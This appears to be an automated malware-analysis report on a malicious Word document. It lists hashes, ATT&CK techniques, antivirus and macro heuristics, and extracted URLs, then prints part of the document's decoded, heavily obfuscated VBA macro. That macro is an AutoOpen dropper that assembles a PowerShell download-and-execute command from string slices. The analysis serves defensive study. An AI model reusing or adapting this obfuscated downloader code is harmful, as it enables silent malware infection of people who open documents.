Office (OLE) malware analysis — malicious · e1e52fb9e12f7a79

MALICIOUS

Office (OLE)

244.0 KB Created: 2017-12-12 07:04:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 4e60670e90433f8daefbb91b0d6eed6b SHA-1: 8a402a05f64a56223a38c4f99bced54b213e316b SHA-256: e1e52fb9e12f7a79bb2ca1837841b713046b2a983f6978f68eab1bfd53220227

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a downloaded payload from a constructed URL. The constructed URL is 'http://localwowrL+wi0s+i0srLi0s+i0sowrL+wrLd.cmCwm7sspZdG2o'. The presence of the AutoOpen macro and Shell() call strongly indicates an attempt to download and execute a secondary malicious payload, typical of a dropper or downloader malware.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://localwowrL+wi0s+i0srLi0s+i0sowrL In document text (OLE body)
- http://bluwrL+wrLeboxsourcing.cowrL+wrLmIn document text (OLE body)
- http://diei0s+i0swrL+wrLsIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 90265 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	90265 bytes
SHA-256: `5a3336efedb9f42c2f0069578886a62035a6b2772d4f681c24ece0cf1ef29a6b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "YwWpanjzKzQ" Function asHwsSc() TaHhjuLaqw = UCase("hBnszrdVwoa" + "ijXKIdif" + "knWBNjKG" + "HWrzdhYAUfIU" + "jcDtwoqKsI" + "TwNQrmHSPL") + Trim("ESkCplIJwXoN" + "tzTnVPbO" + "SijTHIhYq" + "KwXlItz" + "CjKBfjG" + "uSUwzkSrAG") qjXjPzh = Mid("Mirrh6FomwrL+wrL.ua/Hl'+'sWafG9zXhTjG5", 8, 20) womfGl = UCase("kfNpGuzXSunNzw" + "UObYEBWvpIRQYa" + "boQGasMlpG" + "PiaGoztCGiE" + "dvNkXhpdb" + "wTwztYBIcmRYmn") + Trim("jUSWVTpWZm" + "MIoEAcER" + "GHrGVBzCRzFI" + "PoMWHFdJwZ" + "iLsUXmpU" + "DObdMATWnF") TzbmU = UCase("VizbajjCIV" + "KtWKZfCQ" + "zNkOPDtFafjkCX" + "aCHkVwjzBiH" + "ZoLnokHZIul" + "XndccpbI") + Trim("tkWXSvCQQi" + "HbUQPsrzvzV" + "QvNhSDUMGzE" + "EoQWpFIrLFE" + "TNNkzbNYYEGbFN" + "MwWZIXnMabVK") rGaSNY = UCase("NGjKCwjRflS" + "pLMAsoBWBSXQP" + "iomOwuC" + "CAQzCWFQQBVH" + "PINIjTKdvjQvA" + "vfQpYoFJL") + Trim("umiQkBWuIOTj" + "FMbrGHRACC" + "KlzMzThG" + "dNzotstMWnluOG" + "cwwzBtjs" + "VGzCKzpjMjus") OKbpXkubH = Mid("LMISwQKTJhdSKMEQhd2shttp://localwowrL+wi0s+i0srLi0s+i0sowrL'+'+wrLd.cmCwm7sspZdG2o", 20, 50) owTCFFrYKzU = UCase("pdVKrROEqjOim" + "IAhoQcVvvojw" + "fBmIcRXiui" + "knwiWMIuVqfLsm" + "iTthjiu" + "jDEalNOzNRmEdd") + Trim("ZjflahzptWYiD" + "MCRptObRlXhHs" + "uGiaEcUwB" + "UMjNKEMfKJAPU" + "kPQHzIETp" + "vmozdbUOBYUh") UVVSlETc = UCase("mwNNFiPQP" + "iojAWhECuUMTns" + "CYwEiiMSMJzlo" + "FcTGJVNawSzHh" + "XCTKUVD" + "RLhRSWW") + Trim("ZvQOorsNdXibc" + "FazMuKqnRSl" + "LHYsCrD" + "tDqTLfJ" + "jwrbclG" + "UGbMAli") dkTVKC = UCase("IwSLGPDVCUNUJ" + "JJlDbwapb" + "cUUOJzTOI" + "uTEFQGjBbWZPU" + "NHuLiuPSVCimvo" + "CAzLWUqE") + Trim("mVPZOFpMzaBC" + "IjNXcwB" + "iLupYVZEwZ" + "CNYJfqEQNV" + "UmJzsQzzsrDJ" + "KUjpjQIB") wQkCjQZXAAH = Mid("m9uMXBhwrL+wrLuawrL+wrLs);wrL+wrLInwrL+w'+'rLvoke-Iti0s+i0sem(bi6huwrL+wrLawrL+wrLs)w'+'r'+'L+wrL;wrL+wrLbwrL+wrLreak;wrL+wrL}wrL+wi0s+i0srLcati0s+i0scwrL+wri0s+i0sLi0s+i0sh{wriwrL+wrLte-mCKFKckr8BSHVz", 7, 181) kuclzd = UCase("cojkolVmXXmCji" + "OAkGUaJ" + "aBSYwPqEHY" + "qWzYRvbFDFwEW" + "FMMQfKXSQFjVN" + "XjSfirndPb") + Trim("LsVGRbzvi" + "DiocNUXFtpvhC" + "WnSafCbzkzTR" + "Mzdmafi" + "CdDQWQXVmX" + "qnjiJXQfOFt") Msjfj = UCase("izrkZij" + "inBsqIfbcJ" + "zhfwDQzK" + "OjzNkSIJ" + "IqPSTJP" + "PTMDOGGB") + Trim("UzAoUaY" + "KCqnHXAWWU" + "rjNVjvAjz" + "AZqLiwJ" + "RoQqsJHY" + "IvMhrmoKVH") QInTdAbK = UCase("OUXRAXTiqjts" + "KcckOVvkH" + "mTVvNZXQP" + "IYIwDJXk" + "XlojosoIa" + "trCGBkw") + Trim("bFFSPikIlUf" + "EwLTkhwjjCYQ" + "LVQGSHLEiviKEV" + "wjGUctAv" + "iVTmOwYhoVD" + "TCTMUcaC") XhHpw = Mid("7pwXjZWinw5nL5s + bi6kwrL+w3rwbjadW5LE8qnjna6h", 13, 15) ukTwXW = UCase("RtTuaWJcAcY" + "qNFfCAnDOK" + "rklVImBBNrf" + "XUVQWAiXskVVU" + "GlJhDOHScJpA" + "pwbLiLW") + Trim("LjkRDjmiHOPB" + "fQrfnRjEsM" + "WwoYQZnKzEv" + "YQAfVkV" + "azfJijfuuncTUK" + "EuNRibEDRkLTPn") CRoGKkzW = UCase("JfMnlAwEoDL" + "kXznZqfXzVj" + "BiinHIQat" + "YpHwdwc" + "ASsijiWZumu" + "inwumGWIwfm") + Trim("jkwHjbMhuVVR" + "TvARiNdfNR" + "tMMWcTjUfGBw" + "OsTZMkNRfUS" + "WrNRJFTS" + "OTPqFaoAm") DofjADj = UCase("AoAjoTji" + "KFVMBdAdiW" + "TlmWUVRFFmhzjn" + "kSTOYPvf" + "DusEwkOW" + "AmOCdLSC") + Trim("dicImYrtiKT" + "jYGdSZcMHVYLqi" + "vioHvWl" + "wjvIUNFCD" + "JROHYKm" + "qWIKRSDXwKtDX") qDnlCp = Mid("P0a4hhRprLarapawrL+wrLs i0s+i0s'+'+ v5s.exev5s'+';'+'forwrL+wrLeach'+'(bi6a'+'bc inwi0s+i0srL+wrL i0s+i0swrL+wr'+'LbizlDu0rOPMvcqLXnVEju", 9, 109) SAzSqiNMs = UCase("SwUCpuDTc" + "UOrtLFc" + "CWBifRAYD" + "GKYQtCzOBoXW" + "mqNtzbV" + "zwVwQRkQCBR") + Trim("UMSfDUptwEnvf" + "OrRYAzhEH" + "DSckPzwm" + "fkaXipfm" + "iuKZSzCsziB" + "JQFGcksEiz") fiLPmq = UCase("wHKzXQIzCTU" + "jRmnJdUF" + "OJlPdFwQuIA" + "hTHzbnWhrUp" + "IlmkJAQiRvjzY" + "uKLiHKUcwzfp") + Trim("qwYouUwGrTMH" + "sROmkJZtsLVIMi" + "jmoETSZktH" + "dcbDrzbOSCOMN" + "QownCjhqaa" + "iHnbSjU") LRtIanGTzD = UCase("XzpiIiQk" + "wjjzCP ... (truncated)

SHA-256: 5a3336efedb9f42c2f0069578886a62035a6b2772d4f681c24ece0cf1ef29a6b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "YwWpanjzKzQ"
Function asHwsSc()
TaHhjuLaqw = UCase("hBnszrdVwoa" + "ijXKIdif" + "knWBNjKG" + "HWrzdhYAUfIU" + "jcDtwoqKsI" + "TwNQrmHSPL") + Trim("ESkCplIJwXoN" + "tzTnVPbO" + "SijTHIhYq" + "KwXlItz" + "CjKBfjG" + "uSUwzkSrAG")
qjXjPzh = Mid("Mirrh6FomwrL+wrL.ua/Hl'+'sWafG9zXhTjG5", 8, 20)
womfGl = UCase("kfNpGuzXSunNzw" + "UObYEBWvpIRQYa" + "boQGasMlpG" + "PiaGoztCGiE" + "dvNkXhpdb" + "wTwztYBIcmRYmn") + Trim("jUSWVTpWZm" + "MIoEAcER" + "GHrGVBzCRzFI" + "PoMWHFdJwZ" + "iLsUXmpU" + "DObdMATWnF")
TzbmU = UCase("VizbajjCIV" + "KtWKZfCQ" + "zNkOPDtFafjkCX" + "aCHkVwjzBiH" + "ZoLnokHZIul" + "XndccpbI") + Trim("tkWXSvCQQi" + "HbUQPsrzvzV" + "QvNhSDUMGzE" + "EoQWpFIrLFE" + "TNNkzbNYYEGbFN" + "MwWZIXnMabVK")
rGaSNY = UCase("NGjKCwjRflS" + "pLMAsoBWBSXQP" + "iomOwuC" + "CAQzCWFQQBVH" + "PINIjTKdvjQvA" + "vfQpYoFJL") + Trim("umiQkBWuIOTj" + "FMbrGHRACC" + "KlzMzThG" + "dNzotstMWnluOG" + "cwwzBtjs" + "VGzCKzpjMjus")
OKbpXkubH = Mid("LMISwQKTJhdSKMEQhd2shttp://localwowrL+wi0s+i0srLi0s+i0sowrL'+'+wrLd.cmCwm7sspZdG2o", 20, 50)
owTCFFrYKzU = UCase("pdVKrROEqjOim" + "IAhoQcVvvojw" + "fBmIcRXiui" + "knwiWMIuVqfLsm" + "iTthjiu" + "jDEalNOzNRmEdd") + Trim("ZjflahzptWYiD" + "MCRptObRlXhHs" + "uGiaEcUwB" + "UMjNKEMfKJAPU" + "kPQHzIETp" + "vmozdbUOBYUh")
UVVSlETc = UCase("mwNNFiPQP" + "iojAWhECuUMTns" + "CYwEiiMSMJzlo" + "FcTGJVNawSzHh" + "XCTKUVD" + "RLhRSWW") + Trim("ZvQOorsNdXibc" + "FazMuKqnRSl" + "LHYsCrD" + "tDqTLfJ" + "jwrbclG" + "UGbMAli")
dkTVKC = UCase("IwSLGPDVCUNUJ" + "JJlDbwapb" + "cUUOJzTOI" + "uTEFQGjBbWZPU" + "NHuLiuPSVCimvo" + "CAzLWUqE") + Trim("mVPZOFpMzaBC" + "IjNXcwB" + "iLupYVZEwZ" + "CNYJfqEQNV" + "UmJzsQzzsrDJ" + "KUjpjQIB")
wQkCjQZXAAH = Mid("m9uMXBhwrL+wrLuawrL+wrLs);wrL+wrLInwrL+w'+'rLvoke-Iti0s+i0sem(bi6huwrL+wrLawrL+wrLs)w'+'r'+'L+wrL;wrL+wrLbwrL+wrLreak;wrL+wrL}wrL+wi0s+i0srLcati0s+i0scwrL+wri0s+i0sLi0s+i0sh{wriwrL+wrLte-mCKFKckr8BSHVz", 7, 181)
kuclzd = UCase("cojkolVmXXmCji" + "OAkGUaJ" + "aBSYwPqEHY" + "qWzYRvbFDFwEW" + "FMMQfKXSQFjVN" + "XjSfirndPb") + Trim("LsVGRbzvi" + "DiocNUXFtpvhC" + "WnSafCbzkzTR" + "Mzdmafi" + "CdDQWQXVmX" + "qnjiJXQfOFt")
Msjfj = UCase("izrkZij" + "inBsqIfbcJ" + "zhfwDQzK" + "OjzNkSIJ" + "IqPSTJP" + "PTMDOGGB") + Trim("UzAoUaY" + "KCqnHXAWWU" + "rjNVjvAjz" + "AZqLiwJ" + "RoQqsJHY" + "IvMhrmoKVH")
QInTdAbK = UCase("OUXRAXTiqjts" + "KcckOVvkH" + "mTVvNZXQP" + "IYIwDJXk" + "XlojosoIa" + "trCGBkw") + Trim("bFFSPikIlUf" + "EwLTkhwjjCYQ" + "LVQGSHLEiviKEV" + "wjGUctAv" + "iVTmOwYhoVD" + "TCTMUcaC")
XhHpw = Mid("7pwXjZWinw5nL5s + bi6kwrL+w3rwbjadW5LE8qnjna6h", 13, 15)
ukTwXW = UCase("RtTuaWJcAcY" + "qNFfCAnDOK" + "rklVImBBNrf" + "XUVQWAiXskVVU" + "GlJhDOHScJpA" + "pwbLiLW") + Trim("LjkRDjmiHOPB" + "fQrfnRjEsM" + "WwoYQZnKzEv" + "YQAfVkV" + "azfJijfuuncTUK" + "EuNRibEDRkLTPn")
CRoGKkzW = UCase("JfMnlAwEoDL" + "kXznZqfXzVj" + "BiinHIQat" + "YpHwdwc" + "ASsijiWZumu" + "inwumGWIwfm") + Trim("jkwHjbMhuVVR" + "TvARiNdfNR" + "tMMWcTjUfGBw" + "OsTZMkNRfUS" + "WrNRJFTS" + "OTPqFaoAm")
DofjADj = UCase("AoAjoTji" + "KFVMBdAdiW" + "TlmWUVRFFmhzjn" + "kSTOYPvf" + "DusEwkOW" + "AmOCdLSC") + Trim("dicImYrtiKT" + "jYGdSZcMHVYLqi" + "vioHvWl" + "wjvIUNFCD" + "JROHYKm" + "qWIKRSDXwKtDX")
qDnlCp = Mid("P0a4hhRprLarapawrL+wrLs i0s+i0s'+'+ v5s.exev5s'+';'+'forwrL+wrLeach'+'(bi6a'+'bc inwi0s+i0srL+wrL i0s+i0swrL+wr'+'LbizlDu0rOPMvcqLXnVEju", 9, 109)
SAzSqiNMs = UCase("SwUCpuDTc" + "UOrtLFc" + "CWBifRAYD" + "GKYQtCzOBoXW" + "mqNtzbV" + "zwVwQRkQCBR") + Trim("UMSfDUptwEnvf" + "OrRYAzhEH" + "DSckPzwm" + "fkaXipfm" + "iuKZSzCsziB" + "JQFGcksEiz")
fiLPmq = UCase("wHKzXQIzCTU" + "jRmnJdUF" + "OJlPdFwQuIA" + "hTHzbnWhrUp" + "IlmkJAQiRvjzY" + "uKLiHKUcwzfp") + Trim("qwYouUwGrTMH" + "sROmkJZtsLVIMi" + "jmoETSZktH" + "dcbDrzbOSCOMN" + "QownCjhqaa" + "iHnbSjU")
LRtIanGTzD = UCase("XzpiIiQk" + "wjjzCP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.